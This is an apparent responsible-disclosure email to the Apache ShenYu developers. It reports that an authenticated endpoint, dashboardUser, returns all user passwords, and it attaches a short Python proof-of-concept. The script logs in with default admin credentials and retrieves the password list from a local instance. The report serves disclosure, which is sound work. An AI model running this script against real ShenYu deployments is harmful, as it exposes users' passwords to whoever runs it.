Dear Developers of Apache Shenyu, I am reaching you as I was reviewing your application and there is a password leakage in the application.
It means that when a user will request the following URL "dashboardUser?currentPage=1&pageSize=12", the response will disclose all the passswords of the users. [image: image.png] It is not critical as you need to be authenticated but still it is a bad practice. I have attached a Python script to reproduce the issue. You need to set the information (host, username & password) use it. Feel free to reach me should you have questions. Regards, Gregory -- Grégory Draperi
import jwt import time import requests import json import sys import argparse requests.packages.urllib3.disable_warnings() if __name__ == '__main__': print("start"); url = "http://127.0.0.1:9095"; username = "admin"; password = "123456"; payload = {"userName":"admin","password":"123456"}; r = requests.get("http://127.0.0.1:9095/platform/login", params=payload); print(json.loads(r.text)['data']['token']); token = json.loads(r.text)['data']['token']; headers = {'X-Access-Token': token} r2 = requests.get('http://127.0.0.1:9095/dashboardUser?currentPage=1&pageSize=12', headers=headers); print(r2.text); print("end");